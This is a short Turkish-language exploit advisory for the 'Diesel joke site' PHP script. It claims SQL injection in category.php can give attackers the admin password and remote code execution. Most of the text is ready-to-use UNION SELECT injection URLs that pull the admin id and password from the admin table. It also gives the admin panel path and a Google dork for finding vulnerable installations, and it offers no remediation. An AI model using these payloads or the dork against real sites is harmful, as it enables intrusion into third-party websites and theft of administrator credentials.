Diesel joke site kod çalıştırma açığı

Risk : Yüksek

Etkilenenler : Diesel joke site ->> category.php parametresi.

Etki : Sql Enjekte ederek, Uzaktan kod çalıştırma ve admin şifresine ulaşabilme.

Example & Exploits :

admin id;

to joke
script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,ai
d,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*

password:

to joke
script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,ap
ass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%2
0admin/*

aid= admin id
apass= pass of the admin

path to admin panel :

to jokes/admin

Google Dork : Diesel joke site-down

Diğer arama motorlarindan çeşitlendirebilirsiniz açığı.

Onur OKTAY